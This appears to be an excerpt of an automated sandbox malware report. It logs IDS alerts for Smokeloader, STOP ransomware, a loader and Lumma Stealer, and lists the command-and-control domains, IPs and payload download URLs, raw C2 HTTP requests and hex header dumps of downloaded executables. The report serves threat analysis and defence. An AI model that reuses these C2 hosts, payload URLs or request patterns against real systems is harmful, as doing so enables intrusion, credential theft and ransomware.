Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49709 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49710 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49711 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49712 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49713 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49714 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49715 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49716 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49718 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49719 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49720 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49721 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49723 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49724 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49725 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49726 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49727 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.10:49731 -> 190.249.187.165:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.10:49731 -> 190.249.187.165:80
Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.10:49733 -> 189.195.132.134:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.10:49734 -> 189.195.132.134:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.10:49734 -> 189.195.132.134:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.195.132.134:80 -> 192.168.2.10:49732
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.195.132.134:80 -> 192.168.2.10:49733
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49737 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49738 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050741 ET TROJAN Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop) 192.168.2.10:60115 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49739 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.10:49741 -> 172.67.217.100:443
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49742 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49743 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.10:49744 -> 172.67.217.100:443
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49745 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49746 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49748 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49749 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.10:49754 -> 172.67.217.100:443
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49752 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49755 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49757 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.10:49758 -> 172.67.217.100:443
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49759 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.10:49762 -> 172.67.217.100:443
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49763 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49765 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.10:49767 -> 172.67.217.100:443
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49766 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49768 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49770 -> 193.106.175.76:80
Source: Traffic	Snort IDS: 2050742 ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) 192.168.2.10:49771 -> 172.67.217.100:443
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.10:49772 -> 193.106.175.76:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 193.106.175.76 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.217.238 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.133.233 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.249.187.165 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.23.232.80 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: associationokeo.shop
Source: Malware configuration extractor	URLs: turkeyunlikelyofw.shop
Source: Malware configuration extractor	URLs: pooreveningfuseor.pw
Source: Malware configuration extractor	URLs: edurestunningcrackyow.fun
Source: Malware configuration extractor	URLs: detectordiscusser.shop
Source: Malware configuration extractor	URLs: problemregardybuiwo.fun
Source: Malware configuration extractor	URLs: lighterepisodeheighte.fun
Source: Malware configuration extractor	URLs: lighterepisodeheighte.fun
Source: Malware configuration extractor	URLs: technologyenterdo.shop
Source: Malware configuration extractor	URLs: resergvearyinitiani.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199662282318
Source: Malware configuration extractor	URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor	URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor	URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor	URLs: http://sajdfue.com/test1/get.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Apr 2024 15:48:54 GMTContent-Type: application/octet-streamContent-Length: 734208Last-Modified: Thu, 04 Apr 2024 15:40:02 GMTConnection: closeETag: "660ec9d2-b3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e4 ff e6 f3 a0 9e 88 a0 a0 9e 88 a0 a0 9e 88 a0 cf e8 16 a0 b0 9e 88 a0 cf e8 22 a0 ff 9e 88 a0 cf e8 23 a0 84 9e 88 a0 a9 e6 1b a0 a5 9e 88 a0 a0 9e 89 a0 c7 9e 88 a0 cf e8 27 a0 a1 9e 88 a0 cf e8 12 a0 a1 9e 88 a0 cf e8 15 a0 a1 9e 88 a0 52 69 63 68 a0 9e 88 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 03 c7 33 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 b0 00 00 00 6c 7d 02 00 00 00 00 bf 22 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 7d 02 00 04 00 00 81 bc 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 76 0a 00 3c 00 00 00 00 20 7d 02 88 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 6d 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d8 af 00 00 00 10 00 00 00 b0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 16 bf 09 00 00 c0 00 00 00 c0 09 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 99 72 02 00 80 0a 00 00 28 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 96 00 00 00 20 7d 02 00 98 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Apr 2024 15:49:04 GMTServer: ApacheLast-Modified: Thu, 07 Mar 2024 16:56:25 GMTETag: "682058-61314f4b1ca93"Accept-Ranges: bytesContent-Length: 6824024Cache-Control: max-age=31536000, publicExpires: Fri, 04 Apr 2025 15:49:04 GMTVary: Accept-EncodingReferrer-Policy: no-referrer-when-downgradePragma: publicKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 0a 00 69 3a e2 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 50 03 00 00 a4 13 00 00 00 00 00 7f e5 97 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 ce 00 00 04 00 00 ba bb 68 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c7 98 00 f0 00 00 00 00 40 ca 00 28 07 04 00 00 00 00 00 00 00 00 00 00 06 68 00 58 1a 00 00 00 20 ca 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 66 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2b 4f 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c3 29 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 9b 00 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 cb 86 c2 a4 29 59 34 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 cb 86 c2 a4 a0 12 1e 00 00 90 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 c2 a2 7b c2 4b 70 0f 00 00 b0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 a2 7b c2 24 02 00 00 00 30 66 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 a2 7b c2 d0 d9 63 00 00 40 66 00 00 da 63 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 24 1a 00 00 00 20 ca 00 00 1c 00 00 00 e2 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 07 04 00 00 40 ca 00 00 08 04 00 00 fe 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Apr 2024 15:49:04 GMTContent-Type: application/octet-streamContent-Length: 326144Last-Modified: Wed, 03 Apr 2024 09:21:31 GMTConnection: closeETag: "660d1f9b-4fa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 77 ce 1f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 08 01 00 00 b4 45 00 00 00 00 00 f1 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 46 00 00 04 00 00 8f fa 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 8c 01 00 8c 00 00 00 00 80 45 00 72 51 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 22 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d3 06 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 75 00 00 00 20 01 00 00 76 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 d7 43 00 00 a0 01 00 00 26 02 00 00 82 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 72 51 01 00 00 80 45 00 00 52 01 00 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Apr 2024 15:49:22 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /profiles/76561199662282318 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 192.185.16.114 192.185.16.114
Source: Joe Sandbox View	IP Address: 95.216.179.73 95.216.179.73
Source: Joe Sandbox View	IP Address: 103.23.232.80 103.23.232.80

Source: Joe Sandbox View	ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View	ASN Name: IQHOSTRU IQHOSTRU
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: MegaCableSAdeCVMX MegaCableSAdeCVMX

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14013Host: resergvearyinitiani.shop
